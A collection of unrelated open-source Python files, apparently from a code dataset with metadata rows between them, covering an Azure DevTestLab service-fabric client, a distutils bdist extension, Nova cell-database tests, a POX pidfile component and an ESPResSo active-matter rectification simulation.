cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
lab_name=lab_name,
user_name=user_name,
name=name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'labName': self._serialize.url("lab_name", lab_name, 'str'),
'userName': self._serialize.url("user_name", user_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DevTestLab/labs/{labName}/users/{userName}/servicefabrics/{name}'} # type: ignore
async def update(
self,
resource_group_name: str,
lab_name: str,
user_name: str,
name: str,
service_fabric: "_models.ServiceFabricFragment",
**kwargs
) -> "_models.ServiceFabric":
"""Allows modifying tags of service fabrics. All other properties will be ignored.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param lab_name: The name of the lab.
:type lab_name: str
:param user_name: The name of the user profile.
:type user_name: str
:param name: The name of the service fabric.
:type name: str
:param service_fabric: A Service Fabric.
:type service_fabric: ~azure.mgmt.devtestlabs.models.ServiceFabricFragment
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ServiceFabric, or the result of cls(response)
:rtype: ~azure.mgmt.devtestlabs.models.ServiceFabric
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ServiceFabric"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-09-15"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'labName': self._serialize.url("lab_name", lab_name, 'str'),
'userName': self._serialize.url("user_name", user_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(service_fabric, 'ServiceFabricFragment')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ServiceFabric', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DevTestLab/labs/{labName}/users/{userName}/servicefabrics/{name}'} # type: ignore
async def list_applicable_schedules(
self,
resource_group_name: str,
lab_name: str,
user_name: str,
name: str,
**kwargs
) -> "_models.ApplicableSchedule":
"""Lists the applicable start/stop schedules, if any.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param lab_name: The name of the lab.
:type lab_name: str
:param user_name: The name of the user profile.
:type user_name: str
:param name: The name of the service fabric.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ApplicableSchedule, or the result of cls(response)
:rtype: ~azure.mgmt.devtestlabs.models.ApplicableSchedule
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ApplicableSchedule"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-09-15"
accept = "application/json"
# Construct URL
url = self.list_applicable_schedules.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'labName': self._serialize.url("lab_name", lab_name, 'str'),
'userName': self._serialize.url("user_name", user_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ApplicableSchedule', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_applicable_schedules.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DevTestLab/labs/{labName}/users/{userName}/servicefabrics/{name}/listApplicableSchedules'} # type: ignore
async def _start_initial(
self,
resource_group_name: str,
lab_name: str,
user_name: str,
name: str,
**kwargs
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-09-15"
accept = "application/json"
# Construct URL
url = self._start_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'labName': self._serialize.url("lab_name", lab_name, 'str'),
'userName': self._serialize.url("user_name", user_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_start_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DevTestLab/labs/{labName}/users/{userName}/servicefabrics/{name}/start'} # type: ignore
async def begin_start(
self,
resource_group_name: str,
lab_name: str,
user_name: str,
name: str,
**kwargs
) -> AsyncLROPoller[None]:
"""Start a service fabric. This operation can take a while to complete.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param lab_name: The name of the lab.
:type lab_name: str
:param user_name: The name of the user profile.
:type user_name: str
:param name: The name of the service fabric.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._start_initial(
resource_group_name=resource_group_name,
lab_name=lab_name,
user_name=user_name,
name=name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'labName': self._serialize.url("lab_name", lab_name, 'str'),
'userName': self._serialize.url("user_name", user_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_start.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DevTestLab/labs/{labName}/users/{userName}/servicefabrics/{name}/start'} # type: ignore
async def _stop_initial(
self,
resource_group_name: str,
lab_name: str,
user_name: str,
name: str,
**kwargs
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-09-15"
accept = "application/json"
# Construct URL
url = self._stop_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'labName': self._serialize.url("lab_name", lab_name, 'str'),
'userName': self._serialize.url("user_name", user_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_stop_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DevTestLab/labs/{labName}/users/{userName}/servicefabrics/{name}/stop'} # type: ignore
async def begin_stop(
self,
resource_group_name: str,
lab_name: str,
user_name: str,
name: str,
**kwargs
) -> AsyncLROPoller[None]:
"""Stop a service fabric. This operation can take a while to complete.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param lab_name: The name of the lab.
:type lab_name: str
:param user_name: The name of the user profile.
:type user_name: str
:param name: The name of the service fabric.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._stop_initial(
resource_group_name=resource_group_name,
lab_name=lab_name,
user_name=user_name,
name=name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'labName': self._serialize.url("lab_name", lab_name, 'str'),
'userName': self._serialize.url("user_name", user_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_stop.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DevTestLab/labs/{labName}/users/{userName}/servicefabrics/{name}/stop'} # type: ignore
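# Illustrative usage sketch (not part of the generated module): per the class
# docstring, ServiceFabricsOperations is reached through a client instance rather
# than instantiated directly. The client class, credential and attribute name below
# are assumptions for the example, not guaranteed by this file.
#
# from azure.identity.aio import DefaultAzureCredential
# from azure.mgmt.devtestlabs.aio import DevTestLabsClient
#
# async def create_fabric(service_fabric_body):
#     async with DevTestLabsClient(DefaultAzureCredential(), "<subscription-id>") as client:
#         poller = await client.service_fabrics.begin_create_or_update(
#             "my-rg", "my-lab", "my-user", "my-fabric", service_fabric_body)
#         return await poller.result()  # awaits completion of the long-running operation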
| mit | 1,448,853,584,944,195,600 | 47.302784 | 243 | 0.628191 | false |
Pikecillo/genna | external/4Suite-XML-1.0.2/Ft/Lib/DistExt/BDist.py | 1 | 2361 |
import os
import sys
from distutils.command import bdist
from distutils.errors import DistutilsOptionError
from Ft.Lib.DistExt import Util
class BDist(bdist.bdist):
"""
Extended 'bdist' command that adds support for InnoSetup Windows installers
and Python Egg files.
"""
command_name = 'bdist'
default_format = bdist.bdist.default_format.copy()
default_format['nt'] = 'inno'
format_commands = bdist.bdist.format_commands + ['inno', 'egg']
format_command = bdist.bdist.format_command.copy()
format_command['inno'] = ('bdist_inno', 'Windows InnoSetup installer')
format_command['egg'] = ('bdist_egg', 'Python Egg file')
# Try to keep the option help the same between Python versions.
if sys.version < '2.3':
user_options = bdist.bdist.user_options + [
('skip-build', None,
"skip rebuilding everything (for testing/debugging)")
]
boolean_options = ['skip-build']
else:
user_options = bdist.bdist.user_options
boolean_options = bdist.bdist.boolean_options
# Inplace addition must not be used as it could modify the super class'
# attributes.
user_options = user_options + [
('keep-temp', 'k',
"keep the pseudo-installation tree around after " +
"creating the distribution archive"),
]
boolean_options = boolean_options + ['keep-temp']
def initialize_options(self):
bdist.bdist.initialize_options(self)
self.skip_build = False # only necessary for Python 2.2
self.keep_temp = False
return
def finalize_options(self):
self.set_undefined_options('config', ('plat_name', 'plat_name'))
if self.bdist_base is None:
build_base = self.get_finalized_command('build').build_base
bdist_base = 'bdist.' + self.plat_name + '-' + sys.version[:3]
self.bdist_base = os.path.join(build_base, bdist_base)
bdist.bdist.finalize_options(self)
for format in self.formats:
if format not in self.format_command:
raise DistutilsOptionError("invalid format '%s'" % format)
return
sub_commands = []
for format in format_commands:
command, description = format_command[format]
if command not in dict(sub_commands):
sub_commands.append((command, lambda self: False))
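# Illustrative usage sketch (not part of the original module): a setup script would
# register this command class so the extra 'inno' and 'egg' formats become available.
# Note that finalize_options() relies on a companion DistExt 'config' command for
# plat_name, so the sketch below is schematic; the project name is an assumption.
#
# from distutils.core import setup
# from Ft.Lib.DistExt.BDist import BDist
#
# setup(name='example', version='1.0', cmdclass={'bdist': BDist})
#
# # invoked as: python setup.py bdist --formats=inno,egg --keep-temp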
| gpl-2.0 | -4,524,352,369,091,695,000 | 33.217391 | 79 | 0.626853 | false |
gooddata/openstack-nova | nova/tests/functional/db/test_connection_switch.py | 6 | 8666 |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
from oslo_utils.fixture import uuidsentinel as uuids
from oslo_utils import uuidutils
from nova import context
from nova import exception
from nova import objects
from nova import test
from nova.tests import fixtures as nova_fixtures
class ConnectionSwitchTestCase(test.NoDBTestCase):
USES_DB_SELF = True
test_filename = 'foo.db'
fake_conn = 'sqlite:///' + test_filename
def setUp(self):
super(ConnectionSwitchTestCase, self).setUp()
self.addCleanup(self.cleanup)
self.useFixture(nova_fixtures.Database(database='api'))
self.useFixture(nova_fixtures.Database(database='main'))
# Use a file-based sqlite database so data will persist across new
# connections
# The 'main' database connection will stay open, so in-memory is fine
self.useFixture(nova_fixtures.Database(connection=self.fake_conn))
def cleanup(self):
try:
os.remove(self.test_filename)
except OSError:
pass
def test_connection_switch(self):
ctxt = context.RequestContext('fake-user', 'fake-project')
# Make a request context with a cell mapping
mapping = objects.CellMapping(context=ctxt,
uuid=uuidutils.generate_uuid(),
database_connection=self.fake_conn,
transport_url='none:///')
mapping.create()
# Create an instance in the cell database
uuid = uuidutils.generate_uuid()
with context.target_cell(ctxt, mapping) as cctxt:
# Must set project_id because instance get specifies
# project_only=True to model_query, which means non-admin
# users can only read instances for their project
instance = objects.Instance(context=cctxt, uuid=uuid,
project_id='fake-project')
instance.create()
# Verify the instance is found in the cell database
inst = objects.Instance.get_by_uuid(cctxt, uuid)
self.assertEqual(uuid, inst.uuid)
# Verify the instance isn't found in the main database
self.assertRaises(exception.InstanceNotFound,
objects.Instance.get_by_uuid, ctxt, uuid)
class CellDatabasesTestCase(test.NoDBTestCase):
USES_DB_SELF = True
def setUp(self):
super(CellDatabasesTestCase, self).setUp()
self.useFixture(nova_fixtures.Database(database='api'))
fix = nova_fixtures.CellDatabases()
fix.add_cell_database('cell0')
fix.add_cell_database('cell1')
fix.add_cell_database('cell2')
self.useFixture(fix)
self.context = context.RequestContext('fake-user', 'fake-project')
def _create_cell_mappings(self):
cell0_uuid = objects.CellMapping.CELL0_UUID
self.mapping0 = objects.CellMapping(context=self.context,
uuid=cell0_uuid,
database_connection='cell0',
transport_url='none:///')
self.mapping1 = objects.CellMapping(context=self.context,
uuid=uuidutils.generate_uuid(),
database_connection='cell1',
transport_url='none:///')
self.mapping2 = objects.CellMapping(context=self.context,
uuid=uuidutils.generate_uuid(),
database_connection='cell2',
transport_url='none:///')
self.mapping0.create()
self.mapping1.create()
self.mapping2.create()
def test_cell_dbs(self):
self._create_cell_mappings()
# Create an instance and read it from cell1
uuid = uuidutils.generate_uuid()
with context.target_cell(self.context, self.mapping1) as cctxt:
instance = objects.Instance(context=cctxt, uuid=uuid,
project_id='fake-project')
instance.create()
inst = objects.Instance.get_by_uuid(cctxt, uuid)
self.assertEqual(uuid, inst.uuid)
# Make sure it can't be read from cell2
with context.target_cell(self.context, self.mapping2) as cctxt:
self.assertRaises(exception.InstanceNotFound,
objects.Instance.get_by_uuid, cctxt, uuid)
# Make sure it can still be read from cell1
with context.target_cell(self.context, self.mapping1) as cctxt:
inst = objects.Instance.get_by_uuid(cctxt, uuid)
self.assertEqual(uuid, inst.uuid)
# Create an instance and read it from cell2
uuid = uuidutils.generate_uuid()
with context.target_cell(self.context, self.mapping2) as cctxt:
instance = objects.Instance(context=cctxt, uuid=uuid,
project_id='fake-project')
instance.create()
inst = objects.Instance.get_by_uuid(cctxt, uuid)
self.assertEqual(uuid, inst.uuid)
# Make sure it can't be read from cell1
with context.target_cell(self.context, self.mapping1) as cctxt:
self.assertRaises(exception.InstanceNotFound,
objects.Instance.get_by_uuid, cctxt, uuid)
def test_scatter_gather_cells(self):
self._create_cell_mappings()
# Create an instance in cell0
with context.target_cell(self.context, self.mapping0) as cctxt:
instance = objects.Instance(context=cctxt, uuid=uuids.instance0,
project_id='fake-project')
instance.create()
# Create an instance in first cell
with context.target_cell(self.context, self.mapping1) as cctxt:
instance = objects.Instance(context=cctxt, uuid=uuids.instance1,
project_id='fake-project')
instance.create()
# Create an instance in second cell
with context.target_cell(self.context, self.mapping2) as cctxt:
instance = objects.Instance(context=cctxt, uuid=uuids.instance2,
project_id='fake-project')
instance.create()
filters = {'deleted': False, 'project_id': 'fake-project'}
results = context.scatter_gather_all_cells(
self.context, objects.InstanceList.get_by_filters, filters,
sort_dir='asc')
instances = objects.InstanceList()
for result in results.values():
instances = instances + result
# Should have 3 instances across cells
self.assertEqual(3, len(instances))
# Verify we skip cell0 when specified
results = context.scatter_gather_skip_cell0(
self.context, objects.InstanceList.get_by_filters, filters)
instances = objects.InstanceList()
for result in results.values():
instances = instances + result
# Should have gotten only the instances from the last two cells
self.assertEqual(2, len(instances))
self.assertIn(self.mapping1.uuid, results)
self.assertIn(self.mapping2.uuid, results)
instance_uuids = [inst.uuid for inst in instances]
self.assertIn(uuids.instance1, instance_uuids)
self.assertIn(uuids.instance2, instance_uuids)
# Try passing one cell
results = context.scatter_gather_cells(
self.context, [self.mapping1], 60,
objects.InstanceList.get_by_filters, filters)
instances = objects.InstanceList()
for result in results.values():
instances = instances + result
# Should have gotten only one instance from cell1
self.assertEqual(1, len(instances))
self.assertIn(self.mapping1.uuid, results)
self.assertEqual(uuids.instance1, instances[0].uuid)
| apache-2.0 | -7,959,131,255,602,167,000 | 42.114428 | 78 | 0.602469 | false |
twood02/adv-net-samples | sdn/pox/pox/misc/pidfile.py | 44 | 2096 | # Copyright 2013 James McCauley
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Component to create PID files for running POX as a service
"""
from pox.core import core
import os
import atexit
_files = set()
_first_init = False
def _del_pidfiles ():
if not _files: return
try:
msg = "Cleaning up %i pidfile" % (len(_files),)
if len(_files) != 1: msg += 's'
log.debug(msg)
except:
pass
for f in list(_files):
shortname = f
if os.path.abspath(os.path.basename(f)) == f:
shortname = os.path.basename(f)
try:
os.remove(f)
except:
msg = "Couldn't delete pidfile '%s'" % (shortname,)
try:
log.exception(msg)
except:
print(msg)
_files.remove(f)
def _handle_DownEvent (event):
_del_pidfiles()
def launch (file, force = False, __INSTANCE__ = None):
global log
log = core.getLogger()
absfile = os.path.abspath(file)
if absfile in _files:
log.warn("pidfile '%s' specified multiple times", file)
return
global _first_init
if not _first_init:
try:
atexit.register(_del_pidfiles)
except:
log.info('atexit not available')
core.addListenerByName("DownEvent", _handle_DownEvent)
_first_init = True
if os.path.exists(absfile) and not force:
log.error("Aborting startup: pidfile '%s' exists "
"(use --force to override)", file)
return False
try:
f = open(absfile, 'w')
f.write("%s\n" % (os.getpid(),))
except:
log.exception("Failed to create pidfile '%s'", file)
return False
f.close()
_files.add(absfile)
| mit | 839,814,898,453,746,300 | 22.550562 | 74 | 0.650286 | false |
espressomd/espresso | doc/tutorials/active_matter/solutions/rectification_simulation.py | 2 | 6624 | #
# Copyright (C) 2010-2019 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##########################################################################
#
# Active Matter: Rectification Tutorial
#
##########################################################################
import numpy as np
import os
import argparse
import espressomd
from espressomd import assert_features
import espressomd.shapes
import espressomd.math
assert_features(["ENGINE", "LENNARD_JONES", "ROTATION", "MASS"])
# Quaternion procedure
def a2quat(phi, theta):
q1w = np.cos(theta / 2.0)
q1x = 0
q1y = np.sin(theta / 2.0)
q1z = 0
q2w = np.cos(phi / 2.0)
q2x = 0
q2y = 0
q2z = np.sin(phi / 2.0)
q3w = (q1w * q2w - q1x * q2x - q1y * q2y - q1z * q2z)
q3x = (q1w * q2x + q1x * q2w - q1y * q2z + q1z * q2y)
q3y = (q1w * q2y + q1x * q2z + q1y * q2w - q1z * q2x)
q3z = (q1w * q2z - q1x * q2y + q1y * q2x + q1z * q2w)
return [q3w, q3x, q3y, q3z]
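# (Illustrative note, not part of the original tutorial.) a2quat combines a
# rotation about the y-axis (theta) with a rotation about the z-axis (phi)
# into a single quaternion returned as [w, x, y, z]. A quick sanity check:
# a2quat(0.0, 0.0) gives the identity quaternion [1, 0, 0, 0], i.e. no
# rotation at all.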
##########################################################################
parser = argparse.ArgumentParser()
parser.add_argument("vel", type=float, help="Velocity of active particles.")
args = parser.parse_args()
vel = args.vel
##########################################################################
# create an output folder
outdir = "./RESULTS_RECTIFICATION"
os.makedirs(outdir, exist_ok=True)
# Setup the box (we pad the geometry to make sure
# the constraints are away from the edges of the box)
LENGTH = 100
DIAMETER = 20
PADDING = 2
PROD_STEPS = 500
PROD_LENGTH = 500
TIME_STEP = 0.005
# Setup the MD parameters
BOX_L = np.array(
[LENGTH + 2 * PADDING,
DIAMETER + 2 * PADDING,
DIAMETER + 2 * PADDING])
system = espressomd.System(box_l=BOX_L)
system.cell_system.skin = 0.1
system.time_step = TIME_STEP
system.min_global_cut = 0.5
system.thermostat.set_langevin(kT=1.0, gamma=1.0, seed=42)
##########################################################################
#
# Here we use exactly the same parameters for the geometry of the constraints
# that were used for the LB boundaries. This can be done, since the distance
# function used for the constraints is the same as the one used for the
# LB boundaries.
#
##########################################################################
cylinder = espressomd.shapes.Cylinder(
center=0.5 * BOX_L,
axis=[1, 0, 0], radius=DIAMETER / 2.0, length=LENGTH, direction=-1)
system.constraints.add(shape=cylinder, particle_type=1)
# Setup walls
wall = espressomd.shapes.Wall(dist=PADDING, normal=[1, 0, 0])
system.constraints.add(shape=wall, particle_type=1)
wall = espressomd.shapes.Wall(dist=-(LENGTH + PADDING), normal=[-1, 0, 0])
system.constraints.add(shape=wall, particle_type=1)
# Setup cone
IRAD = 4.0
ANGLE = np.pi / 4.0
ORAD = (DIAMETER - IRAD) / np.sin(ANGLE)
SHIFT = 0.25 * ORAD * np.cos(ANGLE)
ctp = espressomd.math.CylindricalTransformationParameters(
axis=[-1, 0, 0], center=[BOX_L[0] / 2.0 - 1.3 * SHIFT, BOX_L[1] / 2.0, BOX_L[2] / 2.0])
hollow_cone = espressomd.shapes.HollowConicalFrustum(
cyl_transform_params=ctp,
r1=ORAD, r2=IRAD, thickness=2.0, length=18,
direction=1)
system.constraints.add(shape=hollow_cone, particle_type=1)
##########################################################################
#
# We set up a WCA (almost-hard) interaction between the particles and the
# confining geometry. We do not have particle-particle interactions, which
# are not necessary to observe rectification.
#
##########################################################################
SIGMA = 0.5
CUTOFF = 1.12246 * SIGMA
EPSILON = 1
SHIFT = 0.25
system.non_bonded_inter[0, 1].lennard_jones.set_params(
epsilon=EPSILON, sigma=SIGMA, cutoff=CUTOFF, shift=SHIFT)
##########################################################################
#
# Setup the particles. We put them all in two points, one in each chamber,
# and give them random directions. This speeds up the equilibration, since
# putting them all in a single chamber would make it take a long time to
# observe the effect of rectification. Note that they need to be able to
# rotate freely, hence the command rotation=[1,1,1] is provided.
#
##########################################################################
N_PART = 500
for cntr in range(N_PART):
if cntr % 2 == 0:
x = 0.25 * BOX_L[0]
else:
x = 0.75 * BOX_L[0]
y = BOX_L[1] / 2.
z = BOX_L[2] / 2.
theta = float(np.random.random() * np.pi)
phi = float(2 * np.random.random() * np.pi)
quats = a2quat(theta, phi)
system.part.add(pos=[x, y, z], type=0, swimming={'v_swim': vel},
quat=quats, rotation=[1, 1, 1])
##########################################################################
# Equilibrate
system.integrator.run(25 * PROD_LENGTH)
# Output the CMS coordinates
with open("{}/CMS_{}.dat".format(outdir, vel), "w") as outfile:
print("####################################################", file=outfile)
print("# time CMS x coord average CMS #", file=outfile)
print("####################################################", file=outfile)
# Production run
dev_sum = 0.0
dev_av = 0.0
system.time = 0.
for i in range(PROD_STEPS):
if (i + 1) % 5 == 0:
print('\rprogress: %.0f%%' % ((i + 1) * 100. / PROD_STEPS),
end='', flush=True)
# We output the coordinate of the center of mass in
# the direction of the long axis, here we consider
# the deviation from the center (keep the padding in mind)
dev = system.galilei.system_CMS()[0] - 0.5 * BOX_L[0]
if i > 0:
dev_sum = dev_sum + dev
dev_av = dev_sum / i
print("{} {} {}".format(system.time, dev, dev_av), file=outfile)
system.integrator.run(PROD_LENGTH)
print()
